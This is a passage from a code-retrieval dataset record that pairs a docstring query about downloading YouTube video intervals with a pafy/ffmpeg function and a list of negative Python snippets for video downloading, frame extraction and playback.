"0.53479016", "0.53402615", "0.53366196", "0.53266114", "0.5325372", "0.5306229", "0.5305461", "0.53030086", "0.53020245", "0.529894", "0.529894", "0.5298093", "0.5297567" ]
0.74180853
0
Function to download videos in specified intervals. Takes a list (interval_list) and a path as inputs
def download_interval(interval_list): start = ['start', 'begin', 'beginning', 'head', 'first'] end = ['slut', 'end', 'tail', 'finish', 'finito', 'fin', 'done', 'finished'] # Iterate over the list for link in range(len(interval_list)): try: video = pafy.new(interval_list[link][0], ydl_opts={ 'nocheckcertificate': True, "noplaylist": True}) # Only downloads the video if the video hasn't been downloaded before if not os.path.exists(os.path.join("tmp", f"{video.title}.mp4")): video_s = video.getbestvideo() # TODO: add a way to get the second best stream (third etc.) when an error occurs using Pafy.videostreams and going through the list video_a = video.getbestaudio() # Checks if the end point is a string if interval_list[link][1][1].lower() in end: # Where is the stream, where should we start, how long should it run mp4_vid = ffmpeg.input( video_s.url, ss=interval_list[link][1][0], t=video.duration) mp4_aud = ffmpeg.input( video_a.url, ss=interval_list[link][1][0], t=video.duration) else: # Where is the stream, where should we start, how long should it run mp4_vid = ffmpeg.input( video_s.url, ss=interval_list[link][1][0], t=interval_list[link][1][1]) mp4_aud = ffmpeg.input( video_a.url, ss=interval_list[link][1][0], t=interval_list[link][1][1]) # Do the processing try: ( ffmpeg .concat( # Specify what you want from the streams (v for video and a for audio) mp4_vid['v'], mp4_aud['a'], # One video stream and one audio stream v=1, a=1 ) # Output is title of video with mp4 ending .output(os.path.join("tmp", f'{video.title}.mp4')) .run() ) except TypeError as e: print(f"An error occurred e 0: {e}") except ffmpeg._run.Error as e: print(f"An error occurred e 1: {e}") except Exception as e: print(f"I couldn't download {interval_list[link]} due to: {e}")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def download_whole(no_interval):\n print(os.getcwd())\n SAVE_PATH = 'tmp'\n ydl_opts = {\"nocheckcertificate\": True, \"noplaylist\": True,\n 'outtmpl': f'{SAVE_PATH}/%(title)s.%(ext)s'}\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n for video in range(len(no_interval)):\n try:\n ydl.download([no_interval[video]])\n except youtube_dl.utils.ExtractorError or youtube_dl.utils.DownloadError:\n print(f\"Couldn't download {no_interval[video]}\")\n continue", "def download_videos(blink, save_dir=\"/media\"):\n blink.download_videos(save_dir, since=get_date())", "def download_cdn_videos(filenames,sub_urls,handout_urls,video_urls, target_dir):\n \"\"\" using a simple file downloader \"\"\"\n for i, v in enumerate(video_urls):\n filename_prefix = str(i+1).zfill(2) + '-'\n #original_filename = v.rsplit('/', 1)[1]\n video_filename = filename_prefix + filenames[i] + '.mp4'\n sub_filename = filename_prefix + filenames[i] + '.srt'\n handout_filename = filename_prefix + filenames[i] + '.srt'\n video_path = os.path.join(target_dir, video_filename)\n sub_path = os.path.join(target_dir, sub_filename)\n handout_path = os.path.join(target_dir, handout_filename)\n #print('[debug] GET %s' % v)\n print('[download] Destination: %s' % video_path)\n v = quote(v,safe=\":/\")\n if len(v) != YOUTUBE_VIDEO_ID_LENGTH:\n req = Request(v) \n try:\n video = urlopen(v)\n fileSize = int(video.headers['content-length'])\n finish = False\n existSize = 0\n if os.path.exists(video_path):\n output = open(video_path,\"ab\")\n existSize = os.path.getsize(video_path)\n #If the file exists, then only download the remainder\n if existSize < fileSize:\n #print(\"[debug] bytes range is: %s-%s\" % (existSize,fileSize))\n req.headers[\"Range\"]= \"bytes=%s-%s\" % (existSize,fileSize)\n video = urlopen(req)\n else:\n finish = True\n else:\n output = open(video_path,\"wb\")\n if finish == False:\n file_size_dl = existSize\n block_sz = 262144\n while True:\n buffer = video.read(block_sz)\n if not buffer:\n break\n \n file_size_dl += len(buffer)\n output.write(buffer)\n status = r\"%10d [%3.2f%%]\" % (file_size_dl, file_size_dl * 100. 
/ fileSize)\n status = status + chr(8)*(len(status)+1)\n sys.stdout.write(status)\n sys.stdout.flush()\n \n output.close()\n\n except URLError as e:\n print(\"[warning]error: %r when downloading %s\" % (e.reason,v) )\n\n else:\n download_youtube_video(v,video_path)\n \n if sub_urls[i] != \"\":\n #print('[debug] GET %s' % BASE_URL+sub_urls[i])\n if not os.path.exists(sub_path):\n subs_string = edx_get_subtitle(sub_urls[i], headers)\n if subs_string:\n print('[info] Writing edX subtitles: %s' % sub_path)\n open(os.path.join(os.getcwd(), sub_path),\n 'wb+').write(subs_string.encode('utf-8'))\n\n if handout_urls[i] != \"\":\n #print('[debug] GET %s' % BASE_URL+sub_urls[i])\n if not os.path.exists(handout_path):\n handout_content = urlopen(BASE_URL+handout_urls[i]).read()\n if handout_content:\n print('[info] Writing handout: %s' % handout_path)\n open(os.path.join(os.getcwd(), handout_path),\n 'wb+').write(handout_content)\n #srtfile = urlopen(BASE_URL+sub_urls[i])\n #output = open(srt_path,'wb')\n #output.write(srtfile.read())\n #output.close()", "def download(pattern):\n query = pattern.lower()\n videolist = getvideolist()\n filename = []\n for video in videolist:\n for value in video.values():\n if query in str(value).lower():\n filename.append(video[\"file\"])\n if filename:\n for name in filename:\n downloadvideo(name)\n else:\n safeprint(\"No video matching the given query was found.\")", "def download(df_shorter,folderName):\n os.mkdir(str(folderName))\n path = os.getcwd()+'\\\\'+str(folderName)+'\\\\'\n #add column with video link generated from IDs\n df_shorter['urls'] = df_shorter['id'].apply(lambda x: generateLinkFromId(x))\n vid_dl = []\n i = 1\n for url in df_shorter['urls']:\n if url != False:\n name = str(i)+'.mp4'\n vid_dl.append(wget.download(url,path+name))#retrun the path of the saved video\n i = i+1\n return vid_dl", "def download_videos(download_limit=6):\n videos = []\n for fname in os.listdir('yt_api_data'):\n videos += load_video_data(fname)\n vids_downloaded = 0\n excluded_vids = get_excluded_videos()\n for video_id, title in videos:\n if download_limit != 'all' and vids_downloaded == download_limit:\n break\n title = title.replace(' ', '_')\n mkv_path = \"videos/\" + title + \".mkv\"\n mp4_path = \"videos/\" + title + \".mp4\"\n download_fpath = \"videos/\" + title\n if not check_excluded_list(excluded_vids, title) and not os.path.isfile(mkv_path) and not os.path.isfile(mp4_path):\n print(colored(str(vids_downloaded + 1) + \": \", \"yellow\") + colored(video_id + \" downloading: \" + download_fpath, \"green\"))\n command_prefix = \"youtube-dl -o \" + download_fpath\n if video_id[0] == '-': \n os.system(command_prefix + \" -- \" + video_id)\n else:\n os.system(command_prefix + \" \" + video_id)\n vids_downloaded += 1\n else:\n print(colored(\"skipping download: \" + title + \"with youtube_id: \" + video_id, \"yellow\"))", "def _download_file(self, video_objects):\n downloaded_video = []\n path=\"media/\"\n for video_object in video_objects:\n if 'contentUrl' in video_object.keys() and video_object['contentUrl']!='':\n \n url = video_object['contentUrl']\n filename = url.split('/')[-1]\n r = requests.get(url, stream=True)\n \n with open(filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024): \n if chunk:\n f.write(chunk)\n\n path+=filename\n return path", "def do_downloads(filename1=\"og\", filename2=\"lyrical\", video_id=DEFALT_VIDEO_ID):\n original_video_url = youtube_id_to_url(video_id)\n download_from_url(original_video_url, filename1)\n 
lyrics_video_url = get_lyrics_url(original_video_url)\n download_from_url(lyrics_video_url, filename2)\n\n return filename1, filename2", "def download_videos(data, category):\n # file_ids = get_existing_file_ids()\n\n # Sorry: This is gross.\n directory = os.path.abspath('./' + slugify(category))\n if not os.path.exists(directory):\n os.mkdir(directory)\n\n print 'Saving files to {0}'.format(directory)\n\n start_time = time.time()\n failed_videos = []\n\n for line in data[category]:\n print ''\n print 'Working on {0} - {1}'.format(line[0], line[2])\n\n # if line[0] in file_ids:\n # print ' Skipping -- already got it'\n # continue\n\n fn = '{0}_{1}'.format(line[0], slugify(line[2]))\n try:\n download_video(line[3], os.path.join(directory, fn))\n except NoDownloadMeNoLikeyException:\n failed_videos.append(line)\n\n print ''\n if failed_videos:\n print 'FAILED VIDEOS:'\n for fail in failed_videos:\n print ' ' + '\\t'.join(fail)\n print ''\n\n print 'Total videos: {0}'.format(len(data[category]))\n print 'Total time: {0}'.format(format_duration(time.time() - start_time))\n return 0", "def download_videos(self, path, since=None, camera=\"all\", stop=10, debug=False):\n if since is None:\n since_epochs = self.last_refresh\n else:\n parsed_datetime = parse(since, fuzzy=True)\n since_epochs = parsed_datetime.timestamp()\n\n formatted_date = get_time(time_to_convert=since_epochs)\n _LOGGER.info(\"Retrieving videos since %s\", formatted_date)\n\n if not isinstance(camera, list):\n camera = [camera]\n\n for page in range(1, stop):\n response = api.request_videos(self, time=since_epochs, page=page)\n _LOGGER.debug(\"Processing page %s\", page)\n try:\n result = response[\"media\"]\n if not result:\n raise IndexError\n except (KeyError, IndexError):\n _LOGGER.info(\"No videos found on page %s. Exiting.\", page)\n break\n\n self._parse_downloaded_items(result, camera, path, debug)", "def multi_download(self, url_list):\n workers = 4\n with ThreadPoolExecutor(workers) as ex:\n urls = [url_list[x] for x in range(len(url_list))]\n self.filenames = [str(y)+\".txt\" for y in range(len(url_list))]\n ex.map(self.download, urls, self.filenames)\n return self.filenames", "def download_video(url, fn):\n start_time = time.time()\n\n # Sorry: This is terrible code, but I'm kind of throwing it\n # together as I discover more about it.\n print ' Downloading {0} to {1}'.format(url, fn)\n\n resp = requests.get(url)\n if resp.status_code != 200:\n print ' GAH! MY EYES! {0} kicked up {1}'.format(url, resp.status_code)\n return\n\n rss_url_m = re.search(r'\"(/rss/flash/\\d+)\"', resp.content)\n rss_url = 'http://blip.tv' + rss_url_m.group(0).strip('\"')\n resp = requests.get(rss_url)\n\n rss_content = resp.content\n\n for ending in POSSIBLE_ENDINGS:\n regex = r'\"http://blip.tv[^\"]+?' 
+ ending + '\"'\n\n download_m = re.search(regex, rss_content)\n if not download_m:\n print ' No {0} url found'.format(ending)\n continue\n\n download_url = download_m.group(0).strip('\"')\n print ' Attempting to download {0}'.format(download_url)\n\n try:\n resp = requests.get(download_url, stream=True)\n print ' Downloading {0}'.format(download_url)\n if resp.status_code == 200:\n total_length = int(resp.headers['content-length'])\n\n if os.path.exists(fn + ending) and file_size(fn + ending) == total_length:\n print ' Already downloaded.'\n return\n\n with open(fn + ending, 'w') as fp:\n total_downloaded = 0\n\n tic_chunk = total_downloaded\n tic = time.time()\n for chunk in resp.iter_content(chunk_size=1024):\n if chunk:\n fp.write(chunk)\n fp.flush()\n tic_chunk += len(chunk)\n total_downloaded += len(chunk)\n\n if time.time() - tic > 1:\n with TERM.location(x=0):\n line = ' {0} {1}kbps'.format(\n format_downloaded(total_downloaded, total_length),\n int(tic_chunk / (time.time() - tic) / 1000))\n sys.stdout.write(line + TERM.clear_eol)\n sys.stdout.flush()\n tic_chunk = 0\n tic = time.time()\n print ''\n\n print ' Done! {0} {1}mb {2}'.format(\n fn + ending,\n int(total_length / 1000000.0),\n format_duration(time.time() - start_time))\n return\n\n else:\n print ' HTTP{0}! GAH! SPUTTER!'.format(resp.status_code)\n\n except requests.exceptions.ConnectionError as exc:\n print ' CONNECTIONERROR! GAH! SPUTTER! {0}'.format(exc)\n\n print ' SO MANY FAILURES!'\n raise NoDownloadMeNoLikeyException()", "def create_original_videos(frames, video_path, interval):\n ncols = int(math.sqrt(len(frames)))\n fig, ax = plt.subplots(\n ncols=ncols,\n nrows=ncols,\n figsize=(5 * ncols, 5 * ncols),\n tight_layout=True,\n )\n max_len = max([len(f) for f in frames])\n\n def init():\n ims = []\n k = 0\n for k in range(ncols):\n for j in range(ncols):\n ims.append(ax[j][k].imshow(unnorm(frames[k * ncols + j][0])))\n ax[j][k].grid(False)\n ax[j][k].set_xticks([])\n ax[j][k].set_yticks([])\n return ims\n\n ims = init()\n\n def update(i):\n print(\"{}/{}\".format(i, max_len))\n for k in range(ncols):\n for j in range(ncols):\n idx = (\n i\n if i < len(frames[k * ncols + j])\n else len(frames[k * ncols + j]) - 1\n )\n ims[k * ncols + j].set_data(unnorm(frames[k * ncols + j][idx]))\n plt.tight_layout()\n return ims\n\n anim = FuncAnimation(\n fig, update, frames=np.arange(max_len), interval=interval, blit=False,\n )\n anim.save(video_path, dpi=80)", "def browse_video_list(video_list: List[str], browser: webdriver.Firefox):\n if not video_list or len(video_list) == 0:\n log.warning(\"Empty video list or null list.\")\n log.debug(\"Video list to be watched: {}\".format(video_list))\n unknown_failure_counter: int = 0\n js_execution_failure_counter: int = 0\n success_count: int = 0\n total_video_length: int = len(video_list)\n log.info(\"Start watching list of videos, total size: {}\".format(total_video_length))\n for i, video in enumerate(video_list):\n current_success: bool = False\n retry_count: int = 0\n video: str = FireFoxSimpleAutoBrowsing.__trim_youtube_link(video)\n log.info(\"Index: {}, watching: {}\".format(i + 1, video))\n current_video_screenshot_dir: str = os.path.join(\n FireFoxSimpleAutoBrowsing.SCREENSHOT_PATH,\n video.replace('/', '-').replace(':', '-').replace('.', '-'))\n if not os.path.exists(current_video_screenshot_dir):\n os.makedirs(current_video_screenshot_dir)\n log.debug(\"\\tCreate dir {} for screenshot\".format(current_video_screenshot_dir))\n log.info(\"\\tScreenshot for video {} saved at 
{}.\"\n .format(video, current_video_screenshot_dir))\n while not current_success and retry_count < FireFoxSimpleAutoBrowsing.RETRY_CHANCES:\n try:\n refreshed: bool = False\n browser.get(video)\n if settings.fast:\n FireFoxSimpleAutoBrowsing.__play_at_fastest_speed(browser)\n current_status: str = FireFoxSimpleAutoBrowsing.__get_player_status(browser)\n video_time: float = FireFoxSimpleAutoBrowsing.__get_video_elapsed_time(browser)\n while current_status != \"ended\" and video_time < settings.watch_time:\n previous_video_time: float = video_time\n previous_status: str = current_status\n log.debug(\"\\tStatus: {}, video time: {:7.2f}s\"\n .format(current_status, video_time))\n time.sleep(FireFoxSimpleAutoBrowsing.STATUS_CHECK_INTERVAL)\n screenshot_file_name: str = \\\n os.path.join(current_video_screenshot_dir, str(time.ctime()) + \".png\")\n browser.save_screenshot(screenshot_file_name)\n video_time = FireFoxSimpleAutoBrowsing.__get_video_elapsed_time(browser)\n current_status = FireFoxSimpleAutoBrowsing.__get_player_status(browser)\n if abs(previous_video_time - video_time) < 10e-3 \\\n and previous_status == current_status \\\n and current_status in ['unstarted', 'paused', 'buffering']:\n if not refreshed:\n browser.refresh()\n log.warning(\"\\tVideo playing frozen. \"\n \"Try resolve by browser refreshed..\")\n refreshed = True\n else:\n raise YouTubePlayerException(\n \"\\tYouTube video play frozen, video stopped time: {}, \"\n \"current play status: {}.\".format(video_time, current_status),\n video)\n current_success = True\n success_count += 1\n except JavascriptException:\n js_execution_failure_counter += 1\n log.warning(\"JavascriptException during watching video {}, \"\n \"most like caused by unavailable video. \"\n \"Traceback is provided for analysis. Jump to next video (if any).\"\n .format(video), exc_info=True)\n break\n except InvalidSessionIdException as e:\n log.critical(\"Lost connection to Firefox browser, or Firefox browser crashed.\"\n \" Probably due to previous viewing too many videos. There is no \"\n \"point to continue current test. 
Quit the whole experiment.\")\n raise\n except Exception as e:\n retry_count += 1\n log.error(\"Exception during watching video {}, caused by: {},\"\n \" retry count: {}\".format(video, e, retry_count),\n exc_info=True)\n if retry_count >= FireFoxSimpleAutoBrowsing.RETRY_CHANCES:\n unknown_failure_counter += 1\n log.error(\"Video {} failed after retry {} times.\"\n .format(video, retry_count))\n log.info(\"Finished watching list, total {}, succeed count: {}, \"\n \"unknown failed count: {}, possible video unavailable count: {}\".\n format(total_video_length, success_count, unknown_failure_counter,\n js_execution_failure_counter))\n return", "def download_all_videos(self, dl_limit=10):\r\n counter = dl_limit\r\n self.video_link_title_keylist = self.video_link_title_dict.keys()\r\n music = []\r\n for title in self.video_link_title_keylist:\r\n try:\r\n title = title.encode('ascii')\r\n # print 'downloading title with counter: ', counter\r\n if not counter:\r\n return random.choice(music) #some margin for randomness, first result isnt always accurate, (gets slower...)\r\n print 'downloading title: ', title\r\n\r\n self.add_result(\"Dowloaded_Song\", title)\r\n\r\n path = self.download_video(self.video_link_title_dict[title], title)\r\n music.append(path)\r\n counter = counter - 1\r\n except:\r\n print \"illegal characters in youtube name\" + title + \"\\n trying next result\"", "def extract_frames_from_directory(count, source, destination):\n all_videos = os.listdir(source)\n print(all_videos)\n\n for video in all_videos:\n video_file = source + video # Retrieve a video from the OverHeadPress\n cap = cv2.VideoCapture(video_file) # capturing the video from the given path\n dim = (224, 224)\n\n while cap.isOpened():\n frame_id = cap.get(1) # current frame number\n ret, frame = cap.read()\n if not ret:\n break\n\n # We are capturing at 28 frames per second. \n # If we want to capture every 0.2 seconds we will take every 5 frames\n if frame_id % 8 == 0:\n filename =\"frame%d.jpg\" % count\n count+=1\n resized = cv2.resize(frame, dim)\n cv2.imwrite(destination + filename, resized)\n\n cap.release()\n print (\"Finished processing: \" + video + \". 
Ended at video: \" + str(count))", "def download_all(self):\r\n download_path = os.path.join(self.download_path, self.username)\r\n already_downloaded = []\r\n successful_downloads = []\r\n failed_downloads = []\r\n if not os.path.exists(download_path):\r\n os.makedirs(download_path)\r\n elif not os.path.isdir(download_path):\r\n raise NotADirectoryError(\"Download path is not a directory: \" + download_path)\r\n elif self.skip_downloaded:\r\n for item in os.listdir(download_path):\r\n file_path = str(os.path.join(download_path, item))\r\n if os.path.isfile(file_path):\r\n parsed_file = self._parse_file_name(os.path.basename(file_path))\r\n if parsed_file is not None:\r\n already_downloaded.append(parsed_file[\"id\"])\r\n for index, item in enumerate(self.videos):\r\n # Don't download it if the user has set that option, and the tiktok already exists on the disk\r\n if item[\"id\"] in already_downloaded:\r\n logger.info(\"Already downloaded video with id: \" + item[\"id\"])\r\n continue\r\n file_name = self._format_file_name(item[\"createTime\"], item[\"id\"])\r\n file_path = os.path.join(download_path, file_name)\r\n logger.info(\"Downloading video: \" + file_name + \" (\" + str(index + 1) + \"/\" + str(len(self.videos)) + \")\")\r\n video_url = self._format_video_url(item)\r\n success = self.download_video(file_path, video_url, item[\"createTime\"])\r\n if success:\r\n successful_downloads.append(video_url)\r\n else:\r\n failed_downloads.append(video_url)\r\n sleep_time = random.uniform(self.sleep_min, self.sleep_max)\r\n logger.info(\"Sleeping for: \" + str(sleep_time) + \" seconds\")\r\n sleep(sleep_time)\r\n logger.info(\"Processed all {} videos\".format(self.video_count))\r\n logger.debug(\"Fallback counter: \" + str(self.fallback_counter))\r\n logger.debug(\"YouTube-dl DownloadError counter: \" + str(self.fallback_counter))\r\n logger.debug(\"Other error counter: \" + str(self.other_error_counter))\r\n return {\"successful_downloads\": successful_downloads,\r\n \"failed_downloads\": failed_downloads,\r\n \"skipped_downloads\": already_downloaded}", "def stitch_video_temporal(intervals, out_path,\n align_args={'align_mode': None},\n dilation_args={'dilation': None}, \n speed=None,\n im_size=(640, 480)):\n # parse args\n align_mode = align_args['align_mode']\n if not align_mode is None:\n out_duration = align_args['out_duration']\n if align_mode == 'phrase':\n segments = align_args['segments']\n dilation = dilation_args['dilation']\n if not dilation is None:\n person_intrvlcol = dilation_args['person_intrvlcol']\n \n intervals = intervals.copy()\n def download_video_clip(interval):\n video_id, sfid, efid, duration = interval\n video = Video.objects.filter(id=video_id)[0]\n start, end = 1. * sfid / video.fps, 1. * efid / video.fps\n video_path = video.download(segment=(start, end))\n if align_mode == 'phrase' and duration != 0:\n video_path = speed_change(video_path, speed=(end-start) / duration)\n return video_path\n \n # deal with phrase duration\n if not align_mode is None:\n in_duration = sum([i[-1] for i in intervals])\n if align_mode == 'phrase':\n num_syllables = [count_syllables(phrase) for phrase in segments]\n duration_per_syl = 1. 
* out_duration / sum(num_syllables)\n for idx, i in enumerate(intervals):\n intervals[idx] = (i[0], i[1], i[2], num_syllables[idx] * duration_per_syl)\n # download clips for each phrase \n clip_paths = par_for(download_video_clip, intervals)\n \n # add silent clip for break \n if not dilation is None and dilation < 0.1:\n dilation = None\n if not dilation is None:\n if dilation > 1:\n break_path = create_silent_clip(person_intrvlcol, dilation)\n else: \n video_id, sfid, efid = intervals[-1][:3]\n video = Video.objects.filter(id=video_id)[0]\n interval = (video_id, efid, efid + int(dilation*video.fps), 0)\n break_path = download_video_clip(interval)\n break_path = mute_video(break_path)\n \n # concat phrase clips\n if len(intervals) > 1:\n lyric_path = concat_videos(clip_paths, im_size=im_size)\n else:\n lyric_path = clip_paths[0]\n \n # global change lyric speed \n if align_mode == 'sentence' or not speed is None: \n if speed is None:\n speed = in_duration / out_duration\n# print(in_duration, out_duration, speed)\n lyric_path = speed_change(lyric_path, speed)\n \n # concat the dilation clip\n if not dilation is None:\n concat_videos([lyric_path, break_path], out_path, im_size=im_size)\n else:\n shutil.move(lyric_path, out_path)", "def download_all(conn, logger):\n # setup slices, 24 in total\n slices = [f'year{x}month{y}' for x in [2, 1] for y in range(12, 0, -1)]\n for slice in slices:\n download_intraday_extended(conn, logger, slice)", "def download(urls, dest_folder):\n pass", "def segment_intervals(filename, basedir, start_sec=0, end_sec=0, seconds_between_frame_grabs=10):\n # Get video id\n video_id = re.findall('v\\d+', filename)[0]\n\n # Open file handle\n vid = imageio.get_reader(filename, 'ffmpeg')\n\n # Get metadata\n meta = vid.get_meta_data()\n fps = int(meta['fps'])\n nframes = meta['nframes']\n frames_to_get = np.arange(start_sec, end_sec, seconds_between_frame_grabs) * fps\n\n # Check frames\n for i in frames_to_get:\n try:\n img = vid.get_data(i)\n except:\n raise\n\n # Downlsample full image\n downsampled = downsample_image(img)\n\n # Player status\n h, w, c = img.shape\n factor = 0.23\n y1 = int(h * 0.04)\n x1 = int(w * (0.5 - factor))\n y2 = int(h * 0.0645)\n x2 = int(w * (0.5 + factor))\n pl_status = crop_rect(img, x1, y1, x2, y2)\n\n # Block out center of player status\n h, w, c = pl_status.shape\n factor = .12\n x1 = int(w * (0.5 - factor))\n x2 = int(w * (0.5 + factor))\n pl_status = blackout_middle(pl_status, x1, x2)\n\n # Write full frame and header frame\n imageio.imwrite(os.path.join(basedir, 'full_{}_s{}.png'.format(video_id, int(i/fps))), img)\n imageio.imwrite(os.path.join(basedir, 'pl_status_{}_s{}.png'.format(video_id, int(i/fps))), pl_status)\n imageio.imwrite(os.path.join(basedir, 'downsampled_{}_s{}.png'.format(video_id, int(i/fps))), downsampled)\n\n vid.close()\n\n return True", "def test_video(video_path):\n def get_clips(frames_list, sequence_size=11):\n clips = []\n clip = []\n cnt = 0\n sz = len(frames_list)\n for i in range(0, sz-sequence_size):\n for idx in range(i, i+sequence_size):\n clip.append(frames_list[idx])\n clips.append(clip)\n clip = []\n return clips\n \n all_frames = []\n # loop over all the images in the folder (0.png,1.png,..,199.png)\n dir_path = listdir(video_path)\n dir_path = sorted(dir_path, key=lambda name: int(name[0:-4]))\n for i in dir_path:\n if str(join(video_path, i))[-3:] == \"png\":\n img_path = join(video_path, i)\n all_frames.append(img_path)\n clips = get_clips(frames_list=all_frames, sequence_size=11)\n# clips = 
get_clips_by_stride(stride=1, frames_list=all_frames, sequence_size=11)\n return clips", "def downloader(urls, path):\n counter = 1\n for media_file in urls:\n # Create the file name\n file_name = \"meme\" + str(counter) + \".jpg\"\n file_location = path + \"/\" + file_name\n print(f\"Downloading {media_file} as {file_name}.\")\n # Overwrite files\n if os.path.exists(file_location):\n os.remove(file_location)\n print(f\"{file_name} will overwrite an existing file of the same name.\")\n wget.download(media_file, out=file_location)\n print(\"\\n\")\n counter += 1\n print(f\"{counter - 1} items were downloaded.\")\n return counter - 1", "def download_list(urls, outdir=None, workdir=None, threads=3):\n pool = ThreadPool(threads)\n download_lambda = lambda x: download(x, outfile=outdir, workdir=workdir)\n pool.map(download_lambda, urls)", "def play_video(path):\r\n #logger.info(\"######: {}, log: {}########\".format('rk8', path))\r\n #original=https://api.hotstar.com/h/v1/play?contentId=1000238814\r\n #path=\"https://api.hotstar.com/h/v2/play/in/contents/1000238814\"\r\n # Create a playable item with a path to play.\r\n data = make_request(path)\r\n #logger.info(\"######: {}, log: {}########\".format('rk3', path))\r\n if not data:\r\n return\r\n\r\n def get_subtitle(url):\r\n #\r\n # https://hses.akamaized.net/videos/hotstarint/hostages/1260003409/1558430241469/\r\n # 265b9dab22d4e9a033e6df6f89639f17/master.m3u8?hdnea=st=1560107863~exp=1560111463~acl=\r\n # /*~hmac=2f6fb393159ed5fa1b12bbf12e954eb377cfa0fc852d4ff5eb24446233237620\r\n #\r\n # https://hses.akamaized.net/videos/hotstarint/hostages/1260003409/1558430241469/\r\n # 5d0f83c3ccbf4501cf952bdfc8c0d785/subtitle/lang_en/sub-0.vtt\r\n #\r\n _url = urlparse(url)\r\n values = _url._asdict()\r\n values['query'] = ''\r\n values['path'] = '{}/subtitle/lang_en/sub-0.vtt'.format(\"/\".join(values['path'].split('/')[:-1]))\r\n\r\n subtitle_url = ParseResult(**values).geturl()\r\n # subtitle_file = kodiutils.download_url_content_to_temp(subtitle_url, '{}-{}.srt'.format(\r\n # Zee5Plugin.safe_string(item['title']),\r\n # subtitle_lang,\r\n # ))\r\n\r\n return subtitle_url\r\n\r\n #logger.info(\"######: {}, log: {}########\".format('rk6', data))\r\n #item = data['body']['results']['item']\r\n item=data['body']['results']['playBackSets'][0]\r\n path = item['playbackUrl']\r\n licenseURL = item.get('licenseUrl')\r\n subtitle = get_subtitle(path)\r\n\r\n logger.info('Playing video URL: {}, licenseURL: {}, subtitle: {}'.format(path, licenseURL, subtitle))\r\n\r\n play_item = xbmcgui.ListItem(path=path)\r\n if licenseURL:\r\n play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')\r\n play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')\r\n play_item.setMimeType('application/dash+xml')\r\n play_item.setContentLookup(False)\r\n\r\n play_item.setSubtitles([get_subtitle(path)])\r\n\r\n # Pass the item to the Kodi player.\r\n xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)", "def api_get_videos_duration(list_videos, api_service):\n if list_videos:\n durations = []\n dates = []\n\n if isinstance(list_videos[0], tuple):\n chunks50 = divide_chunks([video[0] for video in list_videos], 50)\n\n else:\n chunks50 = divide_chunks([video for video in list_videos], 50)\n\n # print(chunks50)\n\n for chunk in chunks50:\n request = api_service.videos().list(id=\",\".join(chunk),\n part=['contentDetails', 'snippet'],\n maxResults=50).execute()\n\n # print(request)\n\n durations += [parse_duration(element[\"contentDetails\"][\"duration\"]) 
for element in request[\"items\"]]\n dates += [element[\"snippet\"][\"publishedAt\"] for element in request[\"items\"]]\n\n # print(len(list_videos), len(durations), len(dates))\n\n id_and_duration = sorted([(video_id, durations[idx], datetime.strptime(dates[idx], \"%Y-%m-%dT%H:%M:%S%z\"))\n for idx, video_id in enumerate(list_videos)], key=lambda tup: tup[2])\n\n return id_and_duration\n\n return []", "def video_slicer(filepath, save_path, start_indexes, end_indexes):\n cap = cv2.VideoCapture(filepath)\n\n frame_width = int(cap.get(3))\n frame_height = int(cap.get(4))\n out = cv2.VideoWriter(save_path,cv2.VideoWriter_fourcc('M','J','P','G'), 30, (frame_width, frame_height))\n\n if len(start_indexes) != len(end_indexes):\n return(\"Time stamps must be the same length\")\n\n basket_counter = 0\n frame_counter = 0\n while True:\n ret, frame = cap.read()\n if not ret:\n # if no more frames then break\n break\n\n if basket_counter >= len(end_indexes):\n # if we've gotten all our slices then break\n break\n\n if frame_counter >= start_indexes[basket_counter] and frame_counter <= end_indexes[basket_counter]:\n # if we are in a basket then save that frame\n out.write(frame)\n elif frame_counter > end_indexes[basket_counter]:\n # if we just left a basket then increment our bascket counter\n basket_counter += 1\n\n frame_counter += 1\n\n\n cap.release()\n out.release()\n print(\"{} clips were sliced\".format(str(basket_counter)))\n print(\"File Saved to {}\".format(save_path))", "def videoFrames(filename, framerate=1):\n vid_file = os.path.join(os.path.dirname(os.getcwd()), \"Database\", \"Video\", filename)\n print(vid_file)\n assert os.path.isfile(vid_file), \"Given path is not a valid file\"\n tmpdir = os.path.join(os.getcwd(), \"tmp\")\n subprocess.run(\n [\n \"ffmpeg\",\n \"-i\",\n vid_file,\n \"-r\",\n f\"{framerate}\",\n os.path.join(tmpdir, \"img_%04d.jpg\"),\n ]\n )\n return [os.path.join(tmpdir, i) for i in os.listdir(tmpdir) if not i.endswith(\".wav\")]", "def kegg_download_manager_synchronous(list_of_ids, wait=1):\n urls = ['http://rest.kegg.jp/get/%s' % '+'.join(chunk) for chunk in chunks(list(list_of_ids), 10)]\n num_urls = len(urls)\n print(f\"Total urls to download: {num_urls}. 
Progress will be shown below.\")\n results = []\n for url in tqdm(urls):\n results.append(download_synchronous(url))\n time.sleep(wait)\n\n return [raw_record for raw_records in results for raw_record in raw_records.split('///')[:-1]]", "def download(server):\n for i in range(10):\n start_time = time.time()\n logging.debug('Start downloading: %d' % i)\n os.system(\"scp %s:18DOWNLOAD downloads/\" % server)\n end_time = time.time()\n logging.debug('End downloading...')\n logging.debug('Time taken by downloader: %s' % (end_time - start_time))", "def fetch_videos():\n channels = get_channels_from_file()\n\n channels_request = service.channels().list(\n part='id, contentDetails',\n forUsername=channels[0]['channelUsername'] # first channel for now\n )\n\n video_list = []\n\n channels_response = channels_request.execute()\n for channel in channels_response['items']:\n uploads_list_id = channel['contentDetails']['relatedPlaylists']['uploads']\n\n next_page_token = ''\n while next_page_token is not None:\n playlistitems_response = service.playlistItems().list(\n playlistId=uploads_list_id,\n part='snippet',\n maxResults=50,\n pageToken=next_page_token\n ).execute()\n\n for playlist_item in playlistitems_response['items']:\n title = playlist_item['snippet']['title']\n video_id = playlist_item['snippet']['resourceId']['videoId']\n print(f'{title}, {video_id}')\n video_list.append({'title': title, 'video_id': video_id})\n\n next_page_token = playlistitems_response.get('nextPageToken')\n\n return video_list", "def download_files(service, file_list, out_path):\n total = len(file_list)\n for i, file_id in enumerate(file_list, 1):\n name = get_file(service, file_id)['title']\n print('Downloading {}... ({}/{}) [{}%]'.format(name, i, total,\n round(i / total * 100)))\n path = os.path.join(out_path, name)\n try:\n download_file(service, file_id, path)\n except 